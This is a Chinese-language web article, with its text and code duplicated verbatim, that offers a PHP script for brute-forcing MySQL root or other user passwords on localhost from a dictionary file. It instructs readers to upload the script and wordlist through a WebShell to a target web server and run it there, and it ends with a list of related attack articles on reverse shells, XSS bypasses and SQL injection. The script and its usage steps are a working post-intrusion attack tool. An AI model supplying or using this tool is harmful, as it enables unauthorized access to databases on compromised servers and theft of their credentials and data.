PHP Mysql 密碼暴力破解代碼,本機暴力破解 3306 端口
發(fā)布時間:2012-01-25 22:28:21 作者:佚名
我要評論

PHP Mysql 密碼暴力破解,本機暴力破解 3306 端口,源碼。代碼簡單的不能再簡單了,就不解釋了,功能很簡單
傳到WebShell上去暴力破解本機的MySql數(shù)據(jù)庫Root或其它用戶的密碼,因為是破解本機,所以速度奇快無比,貌似還有點效果,這個以前有人發(fā)過,這個是我改過的。已知有一處Bug,不清楚為何,密碼數(shù)量少的時候,準確率100%,但是當(dāng)密碼數(shù)量達到5000以上時,準確率0%,明明正確……
<?
set_time_limit(0); //腳本不超時
$user="root"; //用戶名
$passwd=file("password.txt"); //密碼字典
for($i=0;$i<count($passwd);$i++){
$pass=$passwd[$i];
connect($user,$pass);
flush();
}
echo "掃描結(jié)束!";
function connect($user,$pass) {
$conn=@mysql_connect("localhost",$user,$pass);
if($conn){
echo "<font color='#0000FF'><b>得到密碼:<font color='#FF0000'>".$pass."</font>?。?!</b></font>";
exit();
}
else {
echo $pass.'
';
}
}
?>
代碼簡單的不能再簡單了,就不解釋了,功能很簡單,傳到WebShell上去暴力破解本機的MySql數(shù)據(jù)庫Root或其它用戶的密碼,因為是破解本機,所以速度奇快無比,貌似還有點效果,這個以前有人發(fā)過,這個是我改過的。
已知有一處Bug,不清楚為何,密碼數(shù)量少的時候,準確率100%,但是當(dāng)密碼數(shù)量達到5000以上時,準確率0%,明明正確的密碼,卻不顯示正確,除非你把這個密碼放在字典最末尾,才顯示正確,不清楚是什么原因造成的,開始以為是暴破間隔時間太短,加了延時函數(shù),還是這樣。。。
或許只是我個別原因?各位試試就知道了。
用法:
1、修改 PHP 代碼中的用戶名
2、準備字典 password.txt,每行一個,理論上支持無數(shù)行。
3、將腳本和字典一起傳到目標Web服務(wù)器上,訪問該腳本,即開始暴力破解,破解結(jié)果實時輸出,盯著就行了。
復(fù)制代碼
代碼如下:<?
set_time_limit(0); //腳本不超時
$user="root"; //用戶名
$passwd=file("password.txt"); //密碼字典
for($i=0;$i<count($passwd);$i++){
$pass=$passwd[$i];
connect($user,$pass);
flush();
}
echo "掃描結(jié)束!";
function connect($user,$pass) {
$conn=@mysql_connect("localhost",$user,$pass);
if($conn){
echo "<font color='#0000FF'><b>得到密碼:<font color='#FF0000'>".$pass."</font>?。?!</b></font>";
exit();
}
else {
echo $pass.'
';
}
}
?>
代碼簡單的不能再簡單了,就不解釋了,功能很簡單,傳到WebShell上去暴力破解本機的MySql數(shù)據(jù)庫Root或其它用戶的密碼,因為是破解本機,所以速度奇快無比,貌似還有點效果,這個以前有人發(fā)過,這個是我改過的。
已知有一處Bug,不清楚為何,密碼數(shù)量少的時候,準確率100%,但是當(dāng)密碼數(shù)量達到5000以上時,準確率0%,明明正確的密碼,卻不顯示正確,除非你把這個密碼放在字典最末尾,才顯示正確,不清楚是什么原因造成的,開始以為是暴破間隔時間太短,加了延時函數(shù),還是這樣。。。
或許只是我個別原因?各位試試就知道了。
用法:
1、修改 PHP 代碼中的用戶名
2、準備字典 password.txt,每行一個,理論上支持無數(shù)行。
3、將腳本和字典一起傳到目標Web服務(wù)器上,訪問該腳本,即開始暴力破解,破解結(jié)果實時輸出,盯著就行了。
相關(guān)文章
thinkphp代碼執(zhí)行g(shù)etshell的漏洞解決
本文來介紹一下thinkphp官方修復(fù)的一個getshell漏洞,框架對控制器沒有進行足夠的檢測導(dǎo)致的一處getshell,小編覺得挺不錯的,現(xiàn)在分享給大家,也給大家做個參考。一起跟隨2018-12-12記 FineUI 官方論壇discuz所遭受的一次真實網(wǎng)絡(luò)攻擊
這篇文章主要介紹了記 FineUI 官方論壇discuz所遭受的一次真實網(wǎng)絡(luò)攻擊,需要的朋友可以參考下2018-11-30- 這篇文章主要介紹了Linux 下多種反彈 shell 方法,需要的朋友可以參考下2017-09-06
- 這篇文章主要為大家介紹了基于反射的XSS攻擊,主要依靠站點服務(wù)端返回腳本,在客戶端觸發(fā)執(zhí)行從而發(fā)起Web攻擊,需要的朋友可以參考下2017-05-20
- 這篇文章主要介紹了SQL注入黑客防線網(wǎng)站實例分析,需要的朋友可以參考下2017-05-19
- 這里為大家分享一下sql注入的一些語句,很多情況下由于程序員的安全意識薄弱或基本功不足就容易導(dǎo)致sql注入安全問題,建議大家多看一下網(wǎng)上的安全文章,最好的防范就是先學(xué)2017-05-19
- 對于目前流行的sql注入,程序員在編寫程序時,都普遍的加入防注入程序,有些防注入程序只要在我們提交一些非法的參數(shù)后,就會自動的記錄下你的IP地址,提交的非法參數(shù)和動作等,2017-04-29
XSS繞過技術(shù) XSS插入繞過一些方式總結(jié)
我們友情進行XSS檢查,偶然跳出個小彈窗,其中我們總結(jié)了一些平時可能用到的XSS插入方式,方便我們以后進行快速檢查,也提供了一定的思路,其中XSS有反射、存儲、DOM這三類2016-12-27- 這篇文章主要介紹了Python 爬蟲使用動態(tài)切換ip防止封殺的相關(guān)資料,需要的朋友可以參考下2016-10-08
- 這篇文章主要介紹了使用爬蟲采集網(wǎng)站時,解決被封IP的幾種方法的相關(guān)資料,需要的朋友可以參考下2016-10-08